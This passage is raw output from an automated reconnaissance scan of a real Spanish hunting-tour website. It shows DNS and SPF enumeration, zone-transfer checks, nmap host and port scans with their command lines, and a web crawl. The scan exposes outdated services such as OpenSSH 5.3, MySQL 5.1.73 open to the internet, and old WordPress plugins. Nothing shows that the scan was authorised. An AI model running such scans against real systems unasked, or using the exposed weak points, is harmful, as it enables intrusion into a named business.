668 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
669 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
670 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
671 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
672 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
673 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
674 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
675 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
676 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
677 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
678 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
679 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
680 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
681 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
682 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
683
684 * ROBOT Attack:
685 OK - Not vulnerable
686
687
688 SCAN COMPLETED IN 27.51 S
689 -------------------------
690###################################################################################################################################
691Domains still to check: 1
692 Checking if the hostname cazahispanica.com. given is in fact a domain...
693
694Analyzing domain: cazahispanica.com.
695 Checking NameServers using system default resolver...
696 IP: 217.76.128.164 (Spain)
697 HostName: dns47.servidoresdns.net Type: NS
698 HostName: dns47.servidoresdns.net Type: PTR
699 IP: 82.223.218.164 (Spain)
700 HostName: dns48.servidoresdns.net Type: NS
701 HostName: dns48.servidoresdns.net Type: PTR
702
703 Checking MailServers using system default resolver...
704 IP: 82.223.190.100 (Spain)
705 HostName: mx.serviciodecorreo.es Type: MX
706 HostName: mx.serviciodecorreo.es Type: PTR
707
708 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
709 No zone transfer found on nameserver 217.76.128.164
710 No zone transfer found on nameserver 82.223.218.164
711
712 Checking SPF record...
713
714 Checking SPF record...
715
716 Checking SPF record...
717 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.85.0/24, but only the network IP
718 New IP found: 82.223.85.0
719 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.190.0/23, but only the network IP
720 New IP found: 82.223.190.0
721 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.199.0/24, but only the network IP
722 New IP found: 82.223.199.0
723 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.218.0/23, but only the network IP
724 New IP found: 82.223.218.0
725 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.230.0/24, but only the network IP
726 New IP found: 82.223.230.0
727 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.251.0/24, but only the network IP
728 New IP found: 82.223.251.0
729 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.128.0/23, but only the network IP
730 New IP found: 217.76.128.0
731 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.150.128/25, but only the network IP
732 New IP found: 217.76.150.128
733 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.156.128/25, but only the network IP
734 New IP found: 217.76.156.128
735
736 Checking SPF record...
737 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.56.0/23, but only the network IP
738 New IP found: 82.223.56.0
739 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.113.0/24, but only the network IP
740 New IP found: 82.223.113.0
741 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.119.0/24, but only the network IP
742 New IP found: 82.223.119.0
743 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.226.0/24, but only the network IP
744 New IP found: 82.223.226.0
745 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.130.0/23, but only the network IP
746 New IP found: 217.76.130.0
747 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.148.0/23, but only the network IP
748 New IP found: 217.76.148.0
749 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.143.0/24, but only the network IP
750 New IP found: 217.76.143.0
751 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.150.0/25, but only the network IP
752 New IP found: 217.76.150.0
753 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.156.0/25, but only the network IP
754 New IP found: 217.76.156.0
755 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 217.76.132.128/25, but only the network IP
756 New IP found: 217.76.132.128
757 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.208.0/24, but only the network IP
758 New IP found: 82.223.208.0
759 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 82.223.212.0/23, but only the network IP
760 New IP found: 82.223.212.0
761
762 Checking 192 most common hostnames using system default resolver...
763 IP: 217.160.131.142 (Germany)
764 HostName: www.cazahispanica.com. Type: A
765 IP: 82.223.190.234 (Spain)
766 HostName: webmail.cazahispanica.com. Type: A
767
768 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
769 Checking netblock 82.223.212.0
770 Checking netblock 217.76.143.0
771 Checking netblock 82.223.208.0
772 Checking netblock 82.223.199.0
773 Checking netblock 82.223.113.0
774 Checking netblock 82.223.218.0
775 Checking netblock 217.160.131.0
776 Checking netblock 82.223.226.0
777 Checking netblock 82.223.85.0
778 Checking netblock 217.76.128.0
779 Checking netblock 82.223.119.0
780 Checking netblock 82.223.230.0
781 Checking netblock 217.76.150.0
782 Checking netblock 217.76.156.0
783 Checking netblock 217.76.148.0
784 Checking netblock 82.223.251.0
785 Checking netblock 217.76.130.0
786 Checking netblock 217.76.132.0
787 Checking netblock 82.223.56.0
788 Checking netblock 82.223.190.0
789
790 Searching for cazahispanica.com. emails in Google
791 info@cazahispanica.com
792
793 Checking 26 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
794 Host 82.223.212.0 is up (reset ttl 64)
795 Host 217.76.143.0 is up (reset ttl 64)
796 Host 82.223.208.0 is up (reset ttl 64)
797 Host 82.223.199.0 is up (reset ttl 64)
798 Host 82.223.113.0 is up (reset ttl 64)
799 Host 82.223.218.0 is up (reset ttl 64)
800 Host 217.160.131.142 is up (reset ttl 64)
801 Host 82.223.226.0 is up (reset ttl 64)
802 Host 82.223.85.0 is up (reset ttl 64)
803 Host 217.76.128.0 is up (reset ttl 64)
804 Host 82.223.119.0 is up (reset ttl 64)
805 Host 82.223.230.0 is up (reset ttl 64)
806 Host 217.76.150.0 is up (reset ttl 64)
807 Host 217.76.150.128 is up (reset ttl 64)
808 Host 217.76.128.164 is up (reset ttl 64)
809 Host 82.223.218.164 is up (reset ttl 64)
810 Host 217.76.156.128 is up (reset ttl 64)
811 Host 217.76.148.0 is up (reset ttl 64)
812 Host 217.76.156.0 is up (reset ttl 64)
813 Host 82.223.251.0 is up (reset ttl 64)
814 Host 217.76.130.0 is up (reset ttl 64)
815 Host 217.76.132.128 is up (reset ttl 64)
816 Host 82.223.56.0 is up (reset ttl 64)
817 Host 82.223.190.234 is up (reset ttl 64)
818 Host 82.223.190.0 is up (reset ttl 64)
819 Host 82.223.190.100 is up (reset ttl 64)
820
821 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
822 Scanning ip 82.223.212.0 ():
823 Scanning ip 217.76.143.0 ():
824 Scanning ip 82.223.208.0 ():
825 Scanning ip 82.223.199.0 ():
826 Scanning ip 82.223.113.0 ():
827 Scanning ip 82.223.218.0 ():
828 Scanning ip 217.160.131.142 (www.cazahispanica.com.):
829 21/tcp open ftp syn-ack ttl 55 ProFTPD
830 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
831 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
832 | Public Key type: rsa
833 | Public Key bits: 2048
834 | Signature Algorithm: sha1WithRSAEncryption
835 | Not valid before: 2015-01-27T11:06:14
836 | Not valid after: 2016-01-27T11:06:14
837 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
838 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
839 |_ssl-date: 2020-01-05T08:28:08+00:00; -3s from scanner time.
840 | tls-nextprotoneg:
841 |_ ftp
842 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
843 | ssh-hostkey:
844 | 1024 a8:a9:da:bc:cb:8d:0b:ee:5c:06:94:59:e9:e1:9e:6e (DSA)
845 |_ 2048 95:1e:62:e2:8f:bb:20:92:a7:f4:ab:a7:44:f6:37:f0 (RSA)
846 80/tcp open http syn-ack ttl 55 Apache httpd (PleskLin)
847 |_http-favicon: Parallels Control Panel
848 | http-methods:
849 |_ Supported Methods: GET HEAD POST OPTIONS
850 |_http-server-header: Apache
851 |_http-title: Default Parallels Plesk Page
852 443/tcp open ssl/http syn-ack ttl 55 Apache httpd (PleskLin)
853 |_http-favicon: Parallels Control Panel
854 | http-methods:
855 |_ Supported Methods: GET HEAD POST OPTIONS
856 |_http-server-header: Apache
857 |_http-title: Default Parallels Plesk Page
858 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
859 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
860 | Public Key type: rsa
861 | Public Key bits: 2048
862 | Signature Algorithm: sha1WithRSAEncryption
863 | Not valid before: 2015-01-27T11:06:14
864 | Not valid after: 2016-01-27T11:06:14
865 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
866 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
867 |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
868 3306/tcp open mysql syn-ack ttl 55 MySQL 5.1.73
869 | mysql-info:
870 | Protocol: 10
871 | Version: 5.1.73
872 | Thread ID: 564831
873 | Capabilities flags: 63487
874 | Some Capabilities: Speaks41ProtocolOld, InteractiveClient, LongPassword, SupportsLoadDataLocal, Support41Auth, FoundRows, ConnectWithDatabase, LongColumnFlag, SupportsTransactions, SupportsCompression, IgnoreSigpipes, ODBCClient, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, DontAllowDatabaseTableColumn
875 | Status: Autocommit
876 |_ Salt: qEDdN7f|]<Trbq2EBZ"7
877 8443/tcp open ssl/http syn-ack ttl 55 sw-cp-server httpd (Plesk Onyx 17.8.11)
878 |_http-favicon: Parallels Plesk
879 | http-methods:
880 |_ Supported Methods: GET HEAD POST
881 | http-robots.txt: 1 disallowed entry
882 |_/
883 |_http-server-header: sw-cp-server
884 |_http-title: Plesk Onyx 17.8.11
885 | ssl-cert: Subject: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
886 | Issuer: commonName=Parallels Panel/organizationName=Parallels/stateOrProvinceName=Virginia/countryName=US
887 | Public Key type: rsa
888 | Public Key bits: 2048
889 | Signature Algorithm: sha1WithRSAEncryption
890 | Not valid before: 2015-01-27T11:06:14
891 | Not valid after: 2016-01-27T11:06:14
892 | MD5: a6a6 4e22 2c06 27c2 58de c49a bb0d 1a38
893 |_SHA-1: 9907 1423 593d fbd3 32ec 7db7 e8fd b0b9 5581 3476
894 |_ssl-date: 2020-01-05T08:28:07+00:00; -3s from scanner time.
895 | tls-nextprotoneg:
896 |_ http/1.1
897 Device type: general purpose|router|storage-misc|broadband router|WAP
898 Running (JUST GUESSING): Linux 2.6.X|3.X (92%), MikroTik RouterOS 6.X (91%), HP embedded (89%), Ubiquiti embedded (89%), Ubiquiti AirOS 5.X (88%), AVM FritzOS 6.X (87%), Hitron embedded (87%)
899 |_clock-skew: mean: -3s, deviation: 0s, median: -3s
900 Scanning ip 82.223.226.0 ():
901 Scanning ip 82.223.85.0 ():
902 Scanning ip 217.76.128.0 ():
903 Scanning ip 82.223.119.0 ():
904 Scanning ip 82.223.230.0 ():
905 Scanning ip 217.76.150.0 ():
906 Scanning ip 217.76.150.128 ():
907 Scanning ip 217.76.128.164 (dns47.servidoresdns.net (PTR)):
908 53/tcp open domain syn-ack ttl 55 ISC BIND
909 Scanning ip 82.223.218.164 (dns48.servidoresdns.net (PTR)):
910 53/tcp open domain syn-ack ttl 56 ISC BIND
911 873/tcp open rsync syn-ack ttl 56 (protocol version 31)
912 Scanning ip 217.76.156.128 ():
913 Scanning ip 217.76.148.0 ():
914 Scanning ip 217.76.156.0 ():
915 Scanning ip 82.223.251.0 ():
916 Scanning ip 217.76.130.0 ():
917 Scanning ip 217.76.132.128 ():
918 Scanning ip 82.223.56.0 ():
919 Scanning ip 82.223.190.234 (webmail.cazahispanica.com.):
920 80/tcp open http syn-ack ttl 55 nginx
921 | http-methods:
922 |_ Supported Methods: GET HEAD POST OPTIONS
923 |_http-title: Did not follow redirect to https://serviciodecorreo.es/
924 443/tcp open ssl/http syn-ack ttl 55 nginx
925 | http-methods:
926 |_ Supported Methods: GET HEAD POST
927 | http-robots.txt: 1 disallowed entry
928 |_/
929 |_http-title: Webmail :: Welcome to Webmail
930 | ssl-cert: Subject: commonName=*.serviciodecorreo.es/organizationName=Arsys Internet S.L.U./stateOrProvinceName=La Rioja/countryName=ES
931 | Subject Alternative Name: DNS:*.serviciodecorreo.es, DNS:serviciodecorreo.es
932 | Issuer: commonName=Thawte RSA CA 2018/organizationName=DigiCert Inc/countryName=US
933 | Public Key type: rsa
934 | Public Key bits: 2048
935 | Signature Algorithm: sha256WithRSAEncryption
936 | Not valid before: 2018-04-03T00:00:00
937 | Not valid after: 2020-04-03T12:00:00
938 | MD5: 22c2 7e86 0420 22c3 1971 6285 22e9 2c4e
939 |_SHA-1: 1074 ed9e 57e8 e0ea c306 252e 0c74 ad7b ac1b 8e10
940 |_ssl-date: TLS randomness does not represent time
941 | tls-alpn:
942 |_ http/1.1
943 | tls-nextprotoneg:
944 |_ http/1.1
945 Running (JUST GUESSING): Linux 3.X|4.X (85%)
946 Scanning ip 82.223.190.0 ():
947 Scanning ip 82.223.190.100 (mx.serviciodecorreo.es (PTR)):
948 WebCrawling domain's web servers... up to 50 max links.
949
950 + URL to crawl: http://www.cazahispanica.com.
951 + Date: 2020-01-05
952
953 + Crawling URL: http://www.cazahispanica.com.:
954 + Links:
955 + Crawling http://www.cazahispanica.com.
956 + Crawling http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css?ver=4.4.21 (404 Not Found)
957 + Crawling http://www.cazahispanica.com./
958 + Crawling http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js?ver=4.4.21 (404 Not Found)
959 + Searching for directories...
960 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/
961 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/
962 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/
963 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/
964 - Found: http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/
965 + Searching open folders...
966 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/ (404 Not Found)
967 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/ (404 Not Found)
968 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/ (404 Not Found)
969 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/ (404 Not Found)
970 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/ (404 Not Found)
971 + Crawl finished successfully.
972----------------------------------------------------------------------
973Summary of http://http://www.cazahispanica.com.
974----------------------------------------------------------------------
975+ Links crawled:
976 - http://www.cazahispanica.com.
977 - http://www.cazahispanica.com./
978 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css?ver=4.4.21 (404 Not Found)
979 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js?ver=4.4.21 (404 Not Found)
980 Total links crawled: 4
981
982+ Links to files found:
983 Total links to files: 0
984
985+ Externals links found:
986 - http://fonts.googleapis.com/css?family=Droid+Serif%3A400%2C700&
987 - http://fonts.googleapis.com/css?family=Montserrat%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic%2C900%2C900italic&
988 - http://fonts.googleapis.com/css?family=Montserrat&
989 - http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C600%2C700%2C800&
990 - http://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900&
991 - http://gmpg.org/xfn/11
992 - http://www.cazahispanica.com/
993 - http://www.cazahispanica.com/about-us/
994 - http://www.cazahispanica.com/about-us/conventions/
995 - http://www.cazahispanica.com/about-us/media/
996 - http://www.cazahispanica.com/blog/
997 - http://www.cazahispanica.com/comments/feed/
998 - http://www.cazahispanica.com/contact-us/
999 - http://www.cazahispanica.com/faq/
1000 - http://www.cazahispanica.com/feed/
1001 - http://www.cazahispanica.com/hunting/
1002 - http://www.cazahispanica.com/hunting/hunting-experience/
1003 - http://www.cazahispanica.com/hunting/hunting-experience/documents/
1004 - http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
1005 - http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
1006 - http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
1007 - http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
1008 - http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
1009 - http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
1010 - http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
1011 - http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
1012 - http://www.cazahispanica.com/hunting/spain-hunting-packages/
1013 - http://www.cazahispanica.com/hunting/species/
1014 - http://www.cazahispanica.com/hunting/species/balearean-goat-2/
1015 - http://www.cazahispanica.com/hunting/species/chamois-2/
1016 - http://www.cazahispanica.com/hunting/species/deer/
1017 - http://www.cazahispanica.com/hunting/species/red-legged-partridge/
1018 - http://www.cazahispanica.com/hunting/species/spanish-ibex/
1019 - http://www.cazahispanica.com/hunting/species/spanish-wolf/
1020 - http://www.cazahispanica.com/hunting/species/wild-boar/
1021 - http://www.cazahispanica.com/hunting/species/wild-sheep/
1022 - http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
1023 - http://www.cazahispanica.com/testimonials/
1024 - http://www.cazahispanica.com/wp-content/plugins/essential-grid/public/assets/css/settings.css?ver=1.2.0
1025 - http://www.cazahispanica.com/wp-content/plugins/essential-grid/public/assets/js/jquery.themepunch.essential.min.js?ver=1.2.0
1026 - http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/css/js_composer.css?ver=4.6.1
1027 - http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/css/vc-ie8.css
1028 - http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/js/js_composer_front.js?ver=4.6.1
1029 - http://www.cazahispanica.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.6.1
1030 - http://www.cazahispanica.com/wp-content/plugins/landing-pages//shared/assets/js/frontend/analytics/inboundAnalytics.min.js?ver=4.4.21
1031 - http://www.cazahispanica.com/wp-content/plugins/landing-pages//shared/shortcodes/css/frontend-render.css?ver=4.4.21
1032 - http://www.cazahispanica.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&
1033 - http://www.cazahispanica.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&
1034 - http://www.cazahispanica.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&
1035 - http://www.cazahispanica.com/wp-content/themes/medacorp/css/animations.css?ver=4.4.21
1036 - http://www.cazahispanica.com/wp-content/themes/medacorp/css/jquery.mmenu.all.css?ver=4.4.21
1037 - http://www.cazahispanica.com/wp-content/themes/medacorp/css/main.css?ver=4.4.21
1038 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/lib/lightbox/css/lightbox.css?ver=4.4.21
1039 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/lib/lightbox/js/lightbox.min.js?ver=4.4.21
1040 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/lib/owl-carousel/owl.carousel.css?ver=4.4.21
1041 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/lib/owl-carousel/owl.carousel.min.js?ver=4.4.21
1042 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/lib/owl-carousel/owl.theme.css?ver=4.4.21
1043 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/plugins/love-it-pro/includes/js/jquery.cookie.js
1044 - http://www.cazahispanica.com/wp-content/themes/medacorp/inc/plugins/love-it-pro/includes/js/love-it.js
1045 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/jquery.appear.js?ver=4.4.21
1046 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/jquery.easing.js?ver=4.4.21
1047 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/jquery.isotope.min.js?ver=4.4.21
1048 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/jquery.mmenu.min.all.js?ver=4.4.21
1049 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/main.js?ver=4.4.21
1050 - http://www.cazahispanica.com/wp-content/themes/medacorp/js/plugins.js?ver=4.4.21
1051 - http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0
1052 - http://www.cazahispanica.com/wp-content/uploads/2015/07/dallas-safari-club-logo-70x70.png
1053 - http://www.cazahispanica.com/wp-content/uploads/2015/07/favicon.jpg
1054 - http://www.cazahispanica.com/wp-content/uploads/2015/07/safari-club-international-logo-70x70.png
1055 - http://www.cazahispanica.com/wp-content/uploads/2015/08/Book-your-hunt-wallpaper.jpg
1056 - http://www.cazahispanica.com/wp-content/uploads/2015/08/Caza-Hispanica2.jpg
1057 - http://www.cazahispanica.com/wp-content/uploads/2015/08/Hunter-background.jpg
1058 - http://www.cazahispanica.com/wp-content/uploads/2015/08/Hunter.jpg
1059 - http://www.cazahispanica.com/wp-content/uploads/2015/08/hunting-background-wallpaper1.jpg
1060 - http://www.cazahispanica.com/wp-content/uploads/2015/08/logo.png
1061 - http://www.cazahispanica.com/wp-content/uploads/2015/08/logox2.png
1062 - http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-180x180.jpg
1063 - http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-192x192.jpg
1064 - http://www.cazahispanica.com/wp-content/uploads/2015/09/cropped-logo-square-32x32.jpg
1065 - http://www.cazahispanica.com/wp-content/uploads/2016/01/Spain-hunting-Caza-Hispanica.jpg
1066 - http://www.cazahispanica.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
1067 - http://www.cazahispanica.com/wp-includes/js/jquery/jquery.js?ver=1.11.3
1068 - http://www.cazahispanica.com/wp-includes/js/wp-embed.min.js?ver=4.4.21
1069 - http://www.cazahispanica.com/wp-includes/wlwmanifest.xml
1070 - http://www.cazahispanica.com/wp-json/
1071 - http://www.cazahispanica.com/xmlrpc.php
1072 - http://www.cazahispanica.com/xmlrpc.php?rsd
1073 - https://instagram.com/cazahispanica/
1074 - https://plus.google.com/+Cazahispanica
1075 - https://plus.google.com/u/0/109493036396885801729/videos
1076 - https://twitter.com/cazahispanica
1077 - https://www.facebook.com/CazaHispanica
1078 Total external links: 92
1079
1080+ Email addresses found:
1081 Total email address found: 0
1082
1083+ Directories found:
1084 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/ (404 Not Found)
1085 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/ (404 Not Found)
1086 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/ (404 Not Found)
1087 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/css/ (404 Not Found)
1088 - http://www.cazahispanica.com./netdna.bootstrapcdn.com/bootstrap/3.1.1/js/ (404 Not Found)
1089 Total directories: 5
1090
1091+ Directory indexing found:
1092 Total directories with indexing: 0
1093
1094----------------------------------------------------------------------
1095
1096
1097 + URL to crawl: https://www.cazahispanica.com.
1098 + Date: 2020-01-05
1099
1100 + Crawling URL: https://www.cazahispanica.com.:
1101 + Links:
1102 + Crawling https://www.cazahispanica.com. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1103 + Searching for directories...
1104 + Searching open folders...
1105
1106
1107 + URL to crawl: https://www.cazahispanica.com.:8443
1108 + Date: 2020-01-05
1109
1110 + Crawling URL: https://www.cazahispanica.com.:8443:
1111 + Links:
1112 + Crawling https://www.cazahispanica.com.:8443 ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1113 + Searching for directories...
1114 + Searching open folders...
1115
1116
1117 + URL to crawl: http://webmail.cazahispanica.com.
1118 + Date: 2020-01-05
1119
1120 + Crawling URL: http://webmail.cazahispanica.com.:
1121 + Links:
1122 + Crawling http://webmail.cazahispanica.com.
1123 + Crawling http://webmail.cazahispanica.com./skins/larry/styles.min.css?s=1493368165 (File! Not crawling it.)
1124 + Crawling http://webmail.cazahispanica.com./skins/larry/svggradients.min.css?s=1493368165 (File! Not crawling it.)
1125 + Crawling http://webmail.cazahispanica.com./xframework/assets/styles/framework.css?s=1497340056 (404 Not Found)
1126 + Crawling http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/jquery-ui-1.10.4.custom.css?s=1493368164 (File! Not crawling it.)
1127 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/styles/xdesktop.css?s=1497339944 (File! Not crawling it.)
1128 + Crawling http://webmail.cazahispanica.com./
1129 + Crawling http://webmail.cazahispanica.com./skins/larry/ui.min.js?s=1493368165 (File! Not crawling it.)
1130 + Crawling http://webmail.cazahispanica.com./program/js/jquery.min.js?s=1493368164 (File! Not crawling it.)
1131 + Crawling http://webmail.cazahispanica.com./program/js/common.min.js?s=1493368164 (File! Not crawling it.)
1132 + Crawling http://webmail.cazahispanica.com./program/js/app.min.js?s=1493368164 (File! Not crawling it.)
1133 + Crawling http://webmail.cazahispanica.com./program/js/jstz.min.js?s=1493368164 (File! Not crawling it.)
1134 + Crawling http://webmail.cazahispanica.com./xframework/assets/scripts/framework.min.js?s=1497340056 (404 Not Found)
1135 + Crawling http://webmail.cazahispanica.com./plugins/jqueryui/js/jquery-ui-1.10.4.custom.min.js?s=1493368164 (File! Not crawling it.)
1136 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xskin.min.js?s=1497339944 (File! Not crawling it.)
1137 + Crawling http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/xdesktop.min.js?s=1497339944 (File! Not crawling it.)
1138 + Searching for directories...
1139 - Found: http://webmail.cazahispanica.com./xframework/
1140 - Found: http://webmail.cazahispanica.com./xframework/assets/
1141 - Found: http://webmail.cazahispanica.com./xframework/assets/styles/
1142 - Found: http://webmail.cazahispanica.com./xframework/assets/scripts/
1143 - Found: http://webmail.cazahispanica.com./skins/
1144 - Found: http://webmail.cazahispanica.com./skins/larry/
1145 - Found: http://webmail.cazahispanica.com./skins/larry/images/
1146 - Found: http://webmail.cazahispanica.com./images/
1147 - Found: http://webmail.cazahispanica.com./plugins/
1148 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/
1149 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/themes/
1150 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/themes/larry/
1151 - Found: http://webmail.cazahispanica.com./plugins/xskin/
1152 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/
1153 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/styles/
1154 - Found: http://webmail.cazahispanica.com./program/
1155 - Found: http://webmail.cazahispanica.com./program/js/
1156 - Found: http://webmail.cazahispanica.com./plugins/jqueryui/js/
1157 - Found: http://webmail.cazahispanica.com./plugins/xskin/assets/scripts/
1158 + Searching open folders...
1159 - http://webmail.cazahispanica.com./xframework/ (404 Not Found)
1160 - http://webmail.cazahispanica.com./xframework/assets/ (404 Not Found)
1161 - http://webmail.cazahispanica.com./xframework/assets/styles/ (404 Not Found)
